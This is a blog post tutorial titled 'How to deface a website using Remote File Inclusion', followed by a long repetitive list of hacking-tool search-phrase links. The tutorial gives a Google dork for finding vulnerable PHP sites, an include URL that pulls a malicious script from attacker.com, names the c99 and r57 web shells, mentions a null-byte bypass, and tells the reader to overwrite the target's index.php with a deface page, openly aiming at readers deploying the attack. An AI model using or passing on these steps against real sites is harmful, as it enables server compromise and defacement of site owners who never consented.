HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?
Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.
SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?
First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
- You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
- Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related links
- Hacking Tools Online
- Pentest Recon Tools
- Hacking Tools For Windows 7
- Hacking Tools Windows 10
- Github Hacking Tools
- Best Hacking Tools 2020
- Hack Tools For Windows
- Hack Tools For Ubuntu
- Hack Tools For Pc
- Hack Tools For Pc
- Hacking Tools For Mac
- Hack Tools For Games
- Hack Tools Github
- Hackrf Tools
- World No 1 Hacker Software
- What Is Hacking Tools
- Hack Tools For Ubuntu
- Physical Pentest Tools
- Termux Hacking Tools 2019
- Android Hack Tools Github
- Pentest Tools Online
- Hacking Tools Online
- Game Hacking
- Hack Tools
- Hacker Techniques Tools And Incident Handling
- Hacker Tools For Mac
- Hacker Tools Hardware
- Hacker Tools List
- Hacking Tools Name
- Hacker Tools Free
- Hack Tools Github
- Pentest Tools For Windows
- Hacking Tools For Mac
- Hacking Tools For Beginners
- Ethical Hacker Tools
- Hack Tools For Windows
- Hacker Tools Apk
- Hacker Tools Windows
- Hack Tools For Mac
- Pentest Tools Framework
- Pentest Tools
- Hacking Tools Name
- Hack And Tools
- Hack Rom Tools
- Best Hacking Tools 2019
- Hacker Tools 2019
- Hacker Tools For Windows
- Hacker Tools List
- Pentest Recon Tools
- Hacking Tools Name
- Pentest Tools Apk
- Hacking Tools Windows
- Hack Tool Apk No Root
- Hacking App
- Pentest Tools For Android
- Black Hat Hacker Tools
- How To Hack
- World No 1 Hacker Software
- Hacker Tools
- Bluetooth Hacking Tools Kali
- Hacker Tools Software
- Hacking Tools Name
- Hacker Tools For Windows
- Pentest Tools Find Subdomains
- Nsa Hack Tools
- Pentest Tools Github
- Hacker Tools For Mac
- Free Pentest Tools For Windows
- Hacking Tools Software
- Pentest Tools Download
- Hacker Tools 2020
- Hack Tools Mac
- Hack Tool Apk No Root
- Tools 4 Hack
- New Hacker Tools
- Hacker Tools Free
- Hack Tool Apk
- Hacker Tools For Mac
- Pentest Tools Alternative
- Beginner Hacker Tools
- Pentest Tools Open Source
- Tools 4 Hack
- Hack Apps
- Pentest Tools Website
- Pentest Automation Tools
- Pentest Tools For Android
- Hack And Tools
- Pentest Box Tools Download
- Install Pentest Tools Ubuntu
- Hacker Tools Apk
- Pentest Tools Kali Linux
- Hack Tools
- New Hacker Tools
- Pentest Tools Framework
- Hacking Tools Software
- Hacking Tools For Beginners
- Hacking Tools Windows 10
- Easy Hack Tools
- Pentest Tools Apk
- Hacker Tool Kit
- Hacker Tools For Ios
- Hacker Tools Mac
- Hacking Tools 2019
- Hacker Techniques Tools And Incident Handling
- Pentest Tools List
- Hacking Tools For Mac
- Pentest Tools For Android
- Hacking Tools
- World No 1 Hacker Software
- Hacking Tools Usb
- What Are Hacking Tools
- How To Hack
- Install Pentest Tools Ubuntu
- Hacker Tools Apk
- Physical Pentest Tools
- Pentest Tools Url Fuzzer
- Pentest Automation Tools
- Hacking Tools And Software
- Hacking Tools Pc
- Pentest Tools Nmap
- Ethical Hacker Tools
- Pentest Reporting Tools
- Pentest Tools Kali Linux
- Hacking Tools
- Pentest Tools Online
- Hacking Tools
- Hacking Tools
- Pentest Reporting Tools
- Hack Tools
- Hacker Tools
- Hacking Tools And Software
- Hacking Tools Pc
- Hacker Tools 2020
- Hack Tools Github
- Nsa Hacker Tools
- Hacker Hardware Tools
Tidak ada komentar:
Posting Komentar